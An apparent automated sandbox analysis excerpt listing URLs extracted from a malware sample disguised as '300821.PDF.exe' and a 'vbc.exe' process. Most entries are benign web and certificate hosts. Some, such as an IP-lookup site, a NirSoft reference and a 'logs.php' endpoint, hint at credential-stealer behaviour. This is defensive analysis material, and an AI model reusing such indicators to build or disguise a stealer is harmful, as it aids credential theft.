                      Source: bhvE2B1.tmp.8.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBX2afX?h=27&w=27&m=6&q=60&u=t&o=t&l=f&f=png
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBi9v6?m=6&o=true&u=true&n=true&w=30&h=30
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBih5H?m=6&o=true&u=true&n=true&w=30&h=30
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBkwUr?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBnYSFZ?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BByBEMv?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                      Source: 300821.PDF.exe, 00000000.00000002.667948277.0000000004BA1000.00000004.00000001.sdmp, 300821.PDF.exe, 00000005.00000002.916254009.0000000003B61000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: http://ocsp.digicert.com0
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: http://ocsp.digicert.com0:
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: http://ocsp.digicert.com0B
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: http://ocsp.digicert.com0E
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: http://ocsp.digicert.com0F
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: http://ocsp.digicert.com0K
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: http://ocsp.digicert.com0M
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: http://ocsp.digicert.com0R
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: http://ocsp.msocsp.com0
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: http://ocsp.pki.goog/GTSGIAG30
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: http://ocsp.pki.goog/gsr202
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: http://ocsp.pki.goog/gts1o1core0
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: http://pki.goog/gsr2/GTS1O1.crt0
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: http://pki.goog/gsr2/GTS1O1.crt0#
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: http://pki.goog/gsr2/GTS1O1.crt0-
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: http://pki.goog/gsr2/GTS1O1.crt0M
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: http://pki.goog/gsr2/GTSGIAG3.crt0)
                      Source: 300821.PDF.exe, 00000005.00000002.915489413.0000000002B61000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/_h/2366737e/webcore/externalscripts/oneTrust/ski
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/_h/5445db85/webcore/externalscripts/oneTrust/de-
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/_h/975a7d20/webcore/externalscripts/jquery/jquer
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-ch/homepage/_sc/css/3bf20fde-50425371/directi
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-ch/homepage/_sc/css/f60532dd-3aac3bb8/directi
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-ch/homepage/_sc/js/3bf20fde-2923b6c2/directio
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-ch/homepage/_sc/js/3bf20fde-b532f4eb/directio
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-ch/homepage/_sc/js/f60532dd-2923b6c2/directio
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-ch/homepage/_sc/js/f60532dd-f8dd99d9/directio
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/11/755f86.png
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/64/a8a064.gif
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/81/58b810.gif
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/86/2042ed.woff
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/9b/e151e5.gif
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/ea/4996b9.woff
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA61Ofl.img?h=16&w=16&m
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA7XCQ3.img?h=16&w=16&m
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AABzUSt.img?h=368&w=622
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADsAOZ.img?h=166&w=310
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADsZuW.img?h=166&w=310
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADuG4N.img?h=75&w=100&
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADuQtg.img?h=166&w=310
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADuTly.img?h=166&w=310
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADuTp7.img?h=333&w=311
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADuY5J.img?h=166&w=310
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADuZko.img?h=75&w=100&
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADuqZ9.img?h=75&w=100&
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADv4Ge.img?h=75&w=100&
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADv842.img?h=250&w=300
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADvbPR.img?h=250&w=300
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADvbce.img?h=333&w=311
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADvhNP.img?h=333&w=311
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADvoN9.img?h=166&w=310
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAyXiwM.img?h=16&w=16&m
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAyuliQ.img?h=16&w=16&m
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAzjSw3.img?h=16&w=16&m
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB16g6qc.img?h=27&w=27&
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17eTok.img?h=75&w=100
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB18T33l.img?h=166&w=31
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB18qTPD.img?h=16&w=16&
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19x3nX.img?h=166&w=31
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19xGDT.img?h=333&w=31
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19xJbM.img?h=75&w=100
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19xaUu.img?h=166&w=31
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19yF6n.img?h=333&w=31
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19yKf2.img?h=250&w=30
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19ylKx.img?h=75&w=100
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19yuvA.img?h=250&w=30
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19ywNG.img?h=75&w=100
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19yxVU.img?h=166&w=31
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB46JmN.img?h=16&w=16&m
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB6Ma4a.img?h=16&w=16&m
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBMVUFn.img?h=16&w=16&m
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBO5Geh.img?h=16&w=16&m
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBPfCZL.img?h=27&w=27&m
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBRUB0d.img?h=16&w=16&m
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBVuddh.img?h=16&w=16&m
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBWoHwx.img?h=27&w=27&m
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBX2afX.img?h=27&w=27&m
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBi9v6.img?m=6&o=true&u
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBih5H.img?m=6&o=true&u
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBkwUr.img?h=16&w=16&m=
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBnYSFZ.img?h=16&w=16&m
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BByBEMv.img?h=16&w=16&m
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: http://support.google.com/accounts/answer/151657
                      Source: 300821.PDF.exe, 00000000.00000002.667948277.0000000004BA1000.00000004.00000001.sdmp, 300821.PDF.exe, 00000005.00000002.914785913.0000000000402000.00000040.00000001.sdmpString found in binary or memory: http://whatismyipaddress.com/-
                      Source: 300821.PDF.exe, 00000000.00000002.669654926.0000000006FF2000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                      Source: 300821.PDF.exe, 00000000.00000002.669654926.0000000006FF2000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
                      Source: 300821.PDF.exe, 00000000.00000002.669654926.0000000006FF2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
                      Source: 300821.PDF.exe, 00000000.00000002.669654926.0000000006FF2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                      Source: 300821.PDF.exe, 00000000.00000002.669654926.0000000006FF2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                      Source: 300821.PDF.exe, 00000000.00000002.669654926.0000000006FF2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                      Source: 300821.PDF.exe, 00000000.00000002.669654926.0000000006FF2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
                      Source: 300821.PDF.exe, 00000000.00000002.669654926.0000000006FF2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                      Source: 300821.PDF.exe, 00000000.00000002.669654926.0000000006FF2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                      Source: 300821.PDF.exe, 00000000.00000002.669654926.0000000006FF2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                      Source: 300821.PDF.exe, 00000000.00000002.669654926.0000000006FF2000.00000004.00000001.sdmpString found in binary or memory: http://www.fonts.com
                      Source: 300821.PDF.exe, 00000000.00000002.669654926.0000000006FF2000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                      Source: 300821.PDF.exe, 00000000.00000002.669654926.0000000006FF2000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                      Source: 300821.PDF.exe, 00000000.00000002.669654926.0000000006FF2000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                      Source: 300821.PDF.exe, 00000000.00000002.669654926.0000000006FF2000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                      Source: 300821.PDF.exe, 00000000.00000002.669654926.0000000006FF2000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                      Source: 300821.PDF.exe, 00000000.00000002.669654926.0000000006FF2000.00000004.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: http://www.google.com/
                      Source: 300821.PDF.exe, 00000000.00000002.669654926.0000000006FF2000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: http://www.msn.com
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: http://www.msn.com/
                      Source: vbc.exe, 00000008.00000003.691264429.00000000021F5000.00000004.00000001.sdmp, bhvE2B1.tmp.8.drString found in binary or memory: http://www.msn.com/?ocid=iehp
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: http://www.msn.com/de-ch/?ocid=iehp
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: http://www.msn.com/de-ch/entertainment/_h/c920645c/webcore/externalscripts/oneTrustV2/consent/55a804
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: http://www.msn.com/de-ch/entertainment/_h/c920645c/webcore/externalscripts/oneTrustV2/scripttemplate
                      Source: vbc.exe, vbc.exe, 00000009.00000002.684649797.0000000000400000.00000040.00000001.sdmpString found in binary or memory: http://www.nirsoft.net/
                      Source: 300821.PDF.exe, 00000000.00000002.669654926.0000000006FF2000.00000004.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
                      Source: 300821.PDF.exe, 00000000.00000002.669654926.0000000006FF2000.00000004.00000001.sdmpString found in binary or memory: http://www.sakkal.com
                      Source: 300821.PDF.exe, 00000000.00000002.669654926.0000000006FF2000.00000004.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
                      Source: 300821.PDF.exe, 00000005.00000002.915489413.0000000002B61000.00000004.00000001.sdmpString found in binary or memory: http://www.site.com/logs.php
                      Source: 300821.PDF.exe, 00000000.00000002.669654926.0000000006FF2000.00000004.00000001.sdmpString found in binary or memory: http://www.tiro.com
                      Source: 300821.PDF.exe, 00000000.00000002.669654926.0000000006FF2000.00000004.00000001.sdmpString found in binary or memory: http://www.typography.netD
                      Source: 300821.PDF.exe, 00000000.00000002.669654926.0000000006FF2000.00000004.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                      Source: 300821.PDF.exe, 00000000.00000002.669654926.0000000006FF2000.00000004.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                      Source: vbc.exe, 00000008.00000003.691925057.000000000220A000.00000004.00000001.sdmp, bhvE2B1.tmp.8.drString found in binary or memory: https://172.217.23.78/
                      Source: vbc.exe, 00000008.00000003.690799803.000000000220A000.00000004.00000001.sdmp, bhvE2B1.tmp.8.drString found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=8072167097284;g
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=4510094
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://adservice.google.co.uk/adsid/google/si?gadsid=AORoGNRfxSclVePPTskt_ULwutuxovZBENP6CQBK41sqxH
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://adservice.google.co.uk/adsid/google/si?gadsid=AORoGNSN_Te_GQT33AAAR6UNrVcn3a-PGny50bSNsHlzoT
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://adservice.google.co.uk/adsid/google/ui?gadsid=AORoGNQXg7AHkvg6J6S0TqGFa_0HynGV3_XxYfs4fLINJG
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://adservice.google.co.uk/adsid/google/ui?gadsid=AORoGNRxRJyZzZp4KXfYTC7Z4q4fsi2jmRa8YGEqdB288n
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://adservice.google.com/adsid/google/si?gadsid=AORoGNSvKHbjRugN8Bruw1IrFif72u8bwsJvZ4BRSrMAhil_
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://adservice.google.com/adsid/google/si?gadsid=AORoGNTzML9SvDOPLAOFxwn751k-3cAoAULy2FWuSRb89C_P
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://adservice.google.com/adsid/google/ui
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://adservice.google.com/ddm/fls/i/src=2542116;type=2542116;cat=chom0;ord=8072167097284;gtm=2wg9
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingrms
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://amp.azure.net/libs/amp/1.8.0/azuremediaplayer.min.js
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://apis.google.com/_/scs/abc-static/_/js/k=gapi.gapi.en.9Ky5Gf3gP0o.O/m=gapi_iframes
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://arc.msn.com/v3/Delivery/Placement?pubid=da63df93-3dbc-42ae-a505-b34988683ac7&pid=314559&adm=
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RC54c8a2b02c3446f48a60b41e8a5ff47
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RC5bdddb231cf54f958a5b6e76e9d8eee
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RC828bc1cde9f04b788c98b5423157734
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RC9b2d2bc73c8a4a1d8dd5c3d69b6634a
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RCc13122162a9a46c3b4cbf05ffccde0f
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RCc71c68d7b8f049b6a6f3b669bd5d00c
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RCee0d4d5fd4424c8390d703b105f82c3
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RCfd484f9188564713bbc5d13d862ebbf
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://assets.adobedtm.com/launch-EN7b3d710ac67a4a1195648458258f97dd.min.js
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://az416426.vo.msecnd.net/scripts/a/ai.0.js
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://az725175.vo.msecnd.net/scripts/jsll-4.js
                      Source: vbc.exe, 00000008.00000003.690799803.000000000220A000.00000004.00000001.sdmp, bhvE2B1.tmp.8.drString found in binary or memory: https://consent.google.com/?hl=en-GB&origin=https://www.google.com&continue=https://www.google.com/?
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://consent.google.com/done8?continue=https://www.google.com/?gws_rd%3Dssl&origin=https://www.go
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://consent.google.com/set?pc=s&uxe=4421591
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://contextual.media.net/
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://contextual.media.net/48/nrrV18753.js
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://contextual.media.net/803288796/fcmain.js?&gdpr=0&cid=8CU157172&cpcd=pC3JHgSCqY8UHihgrvGr0A%3
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://contextual.media.net/__media__/js/util/nrrV9140.js
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2
                      Source: vbc.exe, 00000008.00000003.691419672.00000000027C5000.00000004.00000001.sdmpString found in binary or memory: https://contextual.media.net/checksync.phphttps://contextual.media.net/medianet.php?cid=8CU157172&cr
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://cvision.media.net/new/100x75/2/249/241/157/ab7b8862-dfb2-4e59-a214-ff623600dbf5.jpg?v=9
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://cvision.media.net/new/100x75/2/89/162/29/8ee7a9a3-dec9-4d15-94e1-5c73b17d2de1.jpg?v=9
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://cvision.media.net/new/100x75/3/148/118/158/6d596081-b574-4a8a-9662-8f180c6f659f.jpg?v=9
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://cvision.media.net/new/286x175/2/249/241/157/ab7b8862-dfb2-4e59-a214-ff623600dbf5.jpg?v=9
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://cvision.media.net/new/286x175/3/148/118/158/6d596081-b574-4a8a-9662-8f180c6f659f.jpg?v=9
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://cvision.media.net/new/300x300/2/41/100/83/b5cbfa68-1c93-41c9-8797-4f9b532bc0b6.jpg?v=9
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://cvision.media.net/new/300x300/3/167/174/27/39ab3103-8560-4a55-bfc4-401f897cf6f2.jpg?v=9
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://dl.google.com/tag/s/appguid%3D%7B8A69D345-D564-463C-AFF1-A69D9E530F96%7D%26iid%3D%7B83C84637
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcQE7dARJDf70CVtvXguPcFi4kAoAFTTEX3FZ_Kd&s=0
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcQEZeIjizh9n8teY_8BOjsYtpLHwSdIq3PT-WQtot4&s=10
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcQFso5PEv3c0kRR2gODJUq62DZF6fnxNsqKUTBX-00QeuCR
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcQJBttAzO3yKFNSKzEm8qyQoBw2vbSHn0xMB0yhbgc&s=10
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcQSkA3BhTLNTXreS8GxkTmsFGydHUKxWR3gtSn5&s=0
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcQYaLHOGeTAvxcl2Kvu_RGdrblf1tOpndi7m5_OMgFvfzlI
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcQc9-XcC69nXJpriIbLos4bSDdjrz_nByi2zL9xxJ4&s=10
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcQcijPNIB_ZGSU0DrjPI_tJ1YOI-6PHUbyHUjTLi3M5nnkK
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcQehqYcvOrRcw1YORGnrCzHbNyjMegefhpqYrPQO8G2_KPc
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcQyeaAiOCtrhzoyiUuHOZcp67UWv4aYiYIKZ629tWqIyQ_l
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcR6qDJUCBqqO8k81oIRUuLKwKNP-ux5oIGn1btf&s=0
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcRXMqY1lU5NXqI7H2QRWgHFAYTsfVdew3_6QMhtv0g&s=10
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcRZaO1x4iyU-YgxgvuerXdFmXdj8Ce3rNy8Mqw2SlqePXDg
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcRlHYHZu1FxxbUNbpii9NbSF3wy4srqmfLAOC-QBxw&s
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcS2yfg_cFEuqKFbNZCaFykqy-jW3vHyGM224t0Sov33iXvh
